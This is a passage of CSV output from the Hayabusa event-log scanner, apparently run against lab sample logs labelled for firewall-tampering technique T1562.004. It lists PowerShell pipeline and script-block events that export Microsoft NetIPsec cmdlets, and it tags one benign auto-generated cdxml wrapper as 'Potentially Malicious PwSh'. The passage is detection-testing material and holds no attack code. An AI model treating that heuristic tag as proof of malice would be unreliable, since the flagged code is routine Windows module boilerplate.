""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.183 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.185 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.185 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.186 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.226 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.226 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.227 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.228 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.228 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.229 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): 
name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.229 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.233 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.276 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.276 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.277 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
